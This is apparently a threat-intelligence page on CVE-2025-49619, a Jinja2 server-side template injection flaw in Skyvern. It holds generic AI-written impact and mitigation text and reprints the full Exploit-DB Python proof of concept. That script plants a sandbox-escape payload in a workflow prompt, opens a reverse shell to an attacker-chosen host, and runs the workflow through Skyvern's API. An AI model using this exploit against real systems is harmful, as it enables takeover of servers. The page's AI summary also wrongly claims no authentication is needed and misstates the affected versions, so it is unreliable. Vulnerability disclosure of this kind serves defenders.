Skyvern 0.1.85 - Remote Code Execution (RCE) via SSTI
Skyvern 0.1.85 - Remote Code Execution (RCE) via SSTI
AI Analysis
Technical Summary
The Skyvern 0.1.85 vulnerability involves a critical Remote Code Execution (RCE) exploit via Server-Side Template Injection (SSTI). SSTI vulnerabilities occur when user input is unsafely embedded into server-side templates, allowing attackers to inject and execute arbitrary code on the server. In this case, Skyvern version 0.1.85 is susceptible to such an injection, enabling attackers to execute arbitrary commands remotely without authentication or user interaction. The exploit leverages the template engine's unsafe handling of input, allowing attackers to bypass typical security controls and gain full control over the affected system. The presence of exploit code written in Python indicates that proof-of-concept or weaponized scripts are available, facilitating exploitation by attackers with moderate technical skills. Although no CVSS score is assigned, the critical severity rating reflects the high risk posed by this vulnerability due to its ability to compromise confidentiality, integrity, and availability of affected systems. The lack of patch links suggests that no official fix has been released yet, increasing the urgency for mitigation and monitoring.
Potential Impact
For European organizations, this vulnerability poses a significant threat, especially those relying on Skyvern 0.1.85 in their web infrastructure. Successful exploitation can lead to full system compromise, data breaches, service disruption, and lateral movement within corporate networks. Confidential information, including personal data protected under GDPR, could be exposed or manipulated, resulting in regulatory penalties and reputational damage. Critical sectors such as finance, healthcare, and government agencies are particularly at risk due to their reliance on secure web applications and the sensitivity of their data. Additionally, the ability to execute arbitrary code remotely without authentication increases the attack surface and lowers the barrier for attackers, including cybercriminals and state-sponsored actors. The absence of known exploits in the wild currently provides a limited window for proactive defense, but the availability of exploit code suggests this may change rapidly.
Mitigation Recommendations
Given the absence of an official patch, European organizations should implement immediate compensating controls. First, conduct a thorough inventory to identify all instances of Skyvern 0.1.85 in use. Employ strict input validation and sanitization on all user-supplied data that interacts with template engines to prevent injection. Deploy Web Application Firewalls (WAFs) with custom rules to detect and block SSTI payload patterns, especially those targeting Skyvern. Monitor network traffic and server logs for unusual template-related errors or suspicious command execution attempts. Isolate vulnerable systems within segmented network zones to limit potential lateral movement. Consider temporary disabling or restricting access to affected services until a patch is available. Engage with vendors or the open-source community for updates or unofficial patches. Finally, conduct security awareness training for developers to avoid unsafe template usage in future deployments.
Affected Countries
Germany, France, United Kingdom, Netherlands, Italy, Spain, Poland, Sweden
Indicators of Compromise
- exploit-code: # Exploit Title: Skyvern 0.1.85 - Remote Code Execution (RCE) via SSTI # Date: 2025-06-15 # Exploit Author: Cristian Branet # Vendor Homepage: https://www.skyvern.com/ # Software Link: https://github.com/Skyvern-AI/skyvern # Version: < 0.1.85, before commit db856cd # Tested on: Skyvern Cloud app / Local Skyvern (Linux Ubuntu 22.04) # CVE : CVE-2025-49619 # Article: https://cristibtz.github.io/posts/CVE-2025-49619/ ''' Skyvern's Workflow Editor allows prompt injection via Jinja2 template syntax. An attacker with low privileges can inject a malicious payload in a block that contains Prompt section, which gets rendered server-side, resulting in blind remote code execution via curl. ''' import requests, argparse, pyfiglet parser = argparse.ArgumentParser(description="This script exploits CVE-2025-49619 in Skyvern to execute a reverse shell command.", formatter_class=argparse.ArgumentDefaultsHelpFormatter) parser.add_argument("-u", "--url", required=True, help="Skyvern URL (e.g., http://example.com:8080)") parser.add_argument("-k", "--x-api-key", required=True, help="Go to Skyvern app -> Settings -> API Key -> Reveal and copy the API key") parser.add_argument("-i", "--ip", required=True, help="IP address to receive the reverse shell connection") parser.add_argument("-p", "--port", required=True, help="Port for the reverse shell connection") def create_exploit_workflow(url, ip, port, x_api_key): exploit_workflow = { "title": "Exploit", "description": "", "proxy_location": "RESIDENTIAL", "webhook_callback_url": "", "persist_browser_session": False, "model": None, "totp_verification_url": None, "workflow_definition": { "parameters": [], "blocks": [ { "label": "block_1", "continue_on_failure": False, "block_type": "task_v2", "prompt": ( "{% for x in ().__class__.__base__.__subclasses__() %}\n" " {% if 'warning' in x.__name__ %}\n" " {{ x()._module.__builtins__['__import__']('os').popen(\n" " \"python3 -c 'import socket,os,pty;\"\n" " \"s=socket.socket();\"\n" f" \'s.connect((\\\"{ip}\\\",{port}));\'\n" " \"os.dup2(s.fileno(),0);\"\n" " \"os.dup2(s.fileno(),1);\"\n" " \"os.dup2(s.fileno(),2);\"\n" " \"pty.spawn(\\\"sh\\\")'\"\n" " ).read() }}\n" " {% endif %}\n" "{% endfor %}" ), "url": "", "max_steps": 25, "totp_identifier": None, "totp_verification_url": None } ] }, "is_saved_task": False } headers = { "Content-Type": "application/json", "X-API-Key": x_api_key } response = requests.post(f"{url}/api/v1/workflows", json=exploit_workflow, headers=headers) if response.status_code == 200: print("[+] Exploit workflow created successfully!") else: print("[-] Failed to create exploit workflow:", response.text) return None workflow_permanent_id = response.json().get("workflow_permanent_id") print(f"[+] Workflow Permanent ID: {workflow_permanent_id}") return workflow_permanent_id def run_exploit_workflow(url, x_api_key, workflow_permanent_id): workflow_data = { "workflow_id": workflow_permanent_id } headers = { "Content-Type": "application/json", "X-API-Key": x_api_key } response = requests.post(f"{url}/api/v1/workflows/{workflow_permanent_id}/run", json=workflow_data, headers=headers) if response.status_code == 200: print("[+] Exploit workflow executed successfully!") else: print("[-] Failed to execute exploit workflow:", response.text) if __name__=="__main__": print("\n") print(pyfiglet.figlet_format("CVE-2025-49619 PoC", font="small", width=100)) print("Author: Cristian Branet") print("GitHub: github.com/cristibtz") print("Description: This script exploits CVE-2025-49619 in Skyvern to execute a reverse shell command.") print("\n") args = parser.parse_args() url = args.url x_api_key = args.x_api_key ip = args.ip port = args.port workflow_permanent_id = create_exploit_workflow(url, ip, port, x_api_key) run_exploit_workflow(url, x_api_key, workflow_permanent_id)
Skyvern 0.1.85 - Remote Code Execution (RCE) via SSTI
Description
Skyvern 0.1.85 - Remote Code Execution (RCE) via SSTI
AI-Powered Analysis
Technical Analysis
The Skyvern 0.1.85 vulnerability involves a critical Remote Code Execution (RCE) exploit via Server-Side Template Injection (SSTI). SSTI vulnerabilities occur when user input is unsafely embedded into server-side templates, allowing attackers to inject and execute arbitrary code on the server. In this case, Skyvern version 0.1.85 is susceptible to such an injection, enabling attackers to execute arbitrary commands remotely without authentication or user interaction. The exploit leverages the template engine's unsafe handling of input, allowing attackers to bypass typical security controls and gain full control over the affected system. The presence of exploit code written in Python indicates that proof-of-concept or weaponized scripts are available, facilitating exploitation by attackers with moderate technical skills. Although no CVSS score is assigned, the critical severity rating reflects the high risk posed by this vulnerability due to its ability to compromise confidentiality, integrity, and availability of affected systems. The lack of patch links suggests that no official fix has been released yet, increasing the urgency for mitigation and monitoring.
Potential Impact
For European organizations, this vulnerability poses a significant threat, especially those relying on Skyvern 0.1.85 in their web infrastructure. Successful exploitation can lead to full system compromise, data breaches, service disruption, and lateral movement within corporate networks. Confidential information, including personal data protected under GDPR, could be exposed or manipulated, resulting in regulatory penalties and reputational damage. Critical sectors such as finance, healthcare, and government agencies are particularly at risk due to their reliance on secure web applications and the sensitivity of their data. Additionally, the ability to execute arbitrary code remotely without authentication increases the attack surface and lowers the barrier for attackers, including cybercriminals and state-sponsored actors. The absence of known exploits in the wild currently provides a limited window for proactive defense, but the availability of exploit code suggests this may change rapidly.
Mitigation Recommendations
Given the absence of an official patch, European organizations should implement immediate compensating controls. First, conduct a thorough inventory to identify all instances of Skyvern 0.1.85 in use. Employ strict input validation and sanitization on all user-supplied data that interacts with template engines to prevent injection. Deploy Web Application Firewalls (WAFs) with custom rules to detect and block SSTI payload patterns, especially those targeting Skyvern. Monitor network traffic and server logs for unusual template-related errors or suspicious command execution attempts. Isolate vulnerable systems within segmented network zones to limit potential lateral movement. Consider temporary disabling or restricting access to affected services until a patch is available. Engage with vendors or the open-source community for updates or unofficial patches. Finally, conduct security awareness training for developers to avoid unsafe template usage in future deployments.
Affected Countries
For access to advanced analysis and higher rate limits, contact root@offseq.com
Technical Details
- Edb Id
- 52335
- Has Exploit Code
- true
- Code Language
- python
Indicators of Compromise
Exploit Source Code
Exploit code for Skyvern 0.1.85 - Remote Code Execution (RCE) via SSTI
# Exploit Title: Skyvern 0.1.85 - Remote Code Execution (RCE) via SSTI # Date: 2025-06-15 # Exploit Author: Cristian Branet # Vendor Homepage: https://www.skyvern.com/ # Software Link: https://github.com/Skyvern-AI/skyvern # Version: < 0.1.85, before commit db856cd # Tested on: Skyvern Cloud app / Local Skyvern (Linux Ubuntu 22.04) # CVE : CVE-2025-49619 # Article: https://cristibtz.github.io/posts/CVE-2025-49619/ ''' Skyvern's Workflow Editor allows prompt injection via Jinja2 template syntax.... (4071 more characters)
Threat ID: 684fad5ba8c921274383b0e7
Added to database: 6/16/2025, 5:36:27 AM
Last enriched: 6/16/2025, 5:36:38 AM
Last updated: 8/18/2025, 11:32:11 PM
Views: 27
Related Threats
Pre-Auth Exploit Chains Found in Commvault Could Enable Remote Code Execution Attacks
HighAI can be used to create working exploits for published CVEs in a few minutes and for a few dollars
MediumNew AI prompt/data-leak scanner — try to break it (PrivGuard)
LowRussian State Hackers Exploit 7-Year-Old Cisco Router Vulnerability
HighApple fixes new zero-day flaw exploited in targeted attacks
CriticalActions
Updates to AI analysis are available only with a Pro account. Contact root@offseq.com for access.
External Links
Need enhanced features?
Contact root@offseq.com for Pro access with improved analysis and higher rate limits.